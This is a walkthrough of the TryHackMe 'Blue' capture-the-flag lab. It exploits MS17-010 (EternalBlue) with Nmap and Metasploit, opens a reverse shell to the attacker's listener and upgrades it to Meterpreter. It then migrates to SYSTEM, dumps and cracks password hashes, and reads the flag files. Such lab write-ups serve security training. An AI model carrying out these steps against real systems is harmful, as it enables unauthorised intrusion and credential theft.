Eternal Blue Exploitation – Walkthrough
Many organization have this as an existing vulnerability on there network as most of the machines vulnerable to this exploit are running legacy systems or the users not comfortable migrating to the newer versions of windows, or the systems Admins are lazy to update the systems. But what is the risk of this? below is a walkthrough of the vulnerability being exploited by attackers.
Here is the https://tryhackme.com/room/blue. Before we begin, we need to connect to the TryHackMe internal network either by using the attack box or VPN provided. Using the attack box is straightforward but in case you may not be familiar with how connect via OpenVPN, please visit https://tryhackme.com/room/openvpn
What is Eternal Blue?
Officially named MS17-010 by Microsoft, eternal blue exploits vulnerability in the Microsoft implementation of the Server Message Block (SMB) Protocol.
This targets a Windows machine that has not been patched against the vulnerability into allowing illegitimate data packets into the legitimate network. These data packets can contain malware such as ransomware or any other similar malicious programs.
In this machine, we are going to use the Metasploit tool, since it has a module exploit for Remote Code Execution, which means that we can execute malicious code to the target machine remotely.
Disclaimer: Some of the IP addresses may vary because of switching from the OpenVPN and using the online attack-box.
[Task 1] Reconnaissance
(#1) As with everything, we’ll start by gathering info about our target machine, we’ll use Nmap to check for open ports and services running on those ports.
$ nmap –A –T4 <ip_addr> • -A =Aggressive scan, I.e. service version, default scripts, OS versions, traceroute • -T4= Aggressive (4) speed scans
From the results we’ll look for an entry point into the box, SMB looks like a great way to get in, we know that SMB V1 has various vulnerabilities that we could exploit. We also notice that our target machine is running windows 7 which has a lot of vulnerabilities.
Simply count the number of open ports which are less than 1000.
(#3) Finding Vulnerabilities
Since SMB is going to be our initial point of entry, we’ll run scripts to enumerate it further. We’ll start with eternal blue or ms_017 which affects the SMB v1 servers in Microsoft. The machine is running windows 7 and could be affected by this vulnerability
We’ll run the following command:
$ nmap -p 445 -script=smb-vuln-ms17-010.nse <ip-address>
[Task 2] Gain Access
(#1) After determining that our target machine is indeed vulnerable to eternal blue, we’ll fire up Metasploit to exploit.
Run the command msfconsole
(#2) Once Metasploit is up and running, search for the eternal blue exploit. We’ll pick the first one that shows eternal blue and select it.
(#3) We want to set the payload to a reverse shell; this will be our initial foothold before getting a more powerful meterpreter shell.
Set payload windows/x64/shell/reverse_tcp
(#4) We’ll set the payload options accordingly, the RHOSTS points to the target machine while the LHOST is our listening machine. Any field that has a required setting of yes, we’ll need to set that up. In order to view what needs to be set, use the command show options;
(#5) With everything set we can run our payload. Let’s keep our fingers crossed for a shell as Metasploit runs. Whoo-hoo! it worked, looks like we got a shell, awesome!!
We’ll run the whoami command to see what user we are in the operating system, the NT authority\system user is a local account on the system.
(#6) We need to escalate this shell to meterpreter in order to perform and run more powerful commands on the target. However, we need to send the shell to the background first by using the command CTRL+Z
[Task 3] Escalate
(#1) After getting a shell on the machine we want to upgrade our shell to a more powerful meterpreter shell which will allow us to run more administrative tasks. To do that we’ll send our session to the background and search for a module to upgrade our shell to meterpreter. We’ll run the following command Search shell_to_meterpreter
(#2) Next, we’ll look at the options that we are required to set for our exploit to upgrade from the regular shell to a more powerful meterpreter shell
(#3) From the options we see that SESSION is the only required field, however we do also need to set LHOST even if the requirement is set to no. For the session we need to set it to the same session as the shell session we got in our previous step. In most cases it is usually set to 1 but we can confirm this by listing all active sessions just to confirm.
We’ll run the following command sessions -i
(#4) After listing the session to 1, same as the previous shell session we can run our exploit, cross our fingers and hope for a meterpreter shell.
And it also looks like we got a meterpreter shell.
(#5) We’ll now need to list all active sessions available since the above exploit does not drop us into our meterpreter. Again we’ll run the list all sessions command sessions -I.
(#6) We’ll choose session 2 to interact with the meterpreter shell
(#7) Running the meterpreter shell allows us to perform more administrative tasks that we would have otherwise not been able to using the regular shell. We’ll run the ps command to list all running processes.
(#8) We want to migrate to a process that is running NT AUTHORITY\SYSTEM so for this we’ll pick on one by running the command migrate <process_id>
If we are successful, we’ll have a migration completed successfully message, you may have to try this a few times as the shell is not stable. We are now running as the user with the highest administrative rights on the system I.e. the administrator.
[Task 4] Cracking
(#1) As the administrator we can view all users on the system and their passwords. We’ll proceed to do just that. We’ll run the command hash dump which will dump all the user ID’s and password hashes that are stored in the local SAM database.
(#2) Now that we have the password hashes, we’ll use different tools to crack them, among the tools we could use are hash cat and john the ripper. We could also use an online tool like crack station which would work just fine. Let’s crack Jon’s password hash to get the answer to the next section.
[Task 5] Find Flags
(#1) Next, we’ll proceed to find flags to the next sections. According to the first instruction the flag is found in the system root. To get there we’ll type the following command to change directory to the root directory Cd \
We read the contents of flag1.txt.
(#2) The second flag is stored where passwords are stored in windows. So, we’ll have to navigate to this location. By default, windows stores its passwords in the Windows\system32\Config directory.
List to view files within this folder, you will see a flag2.txt file. In order to get the 2nd flag we’ll read the flag2.txt.
(#3) The third and final flag is stored at a place that has a lot of interesting things saved. So the first thing that comes to mind is the documents folder, let’s head over there and see what we have.
We’ll run the following command to change directories to Jon’s Documents
We finally have our final flag by running the cat command.
Hurray!! You have successfully completed the blue Machine, we hope you have learnt something new.